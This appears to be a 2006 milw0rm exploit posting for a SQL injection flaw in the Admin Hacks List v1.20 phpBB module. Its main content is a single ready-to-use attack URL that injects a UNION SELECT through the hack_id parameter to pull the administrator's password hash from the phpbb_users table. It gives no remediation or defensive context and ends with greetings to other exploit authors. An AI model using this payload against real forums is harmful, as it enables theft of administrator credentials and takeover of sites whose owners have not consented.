16 lines
No EOL
640 B
Text
16 lines
No EOL
640 B
Text
########################################################################
|
|
# Admin Hacks List v1.20 Remote SQL Injection Vulnerability
|
|
#
|
|
# Download: http://www.nivisec.com
|
|
#
|
|
# Found By: the master
|
|
#
|
|
########################################################################
|
|
# exploit:
|
|
#
|
|
# http://[Target]/[Path]/admin/admin_hacks_list.php?mode=edit&hack_id=-99%20UNION%20SELECT%20null,null,user_password,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id=2&sid=AdminHash
|
|
#
|
|
# Greetz: str0ke , Dr Max Virus
|
|
########################################################################
|
|
|
|
# milw0rm.com [2006-11-26] |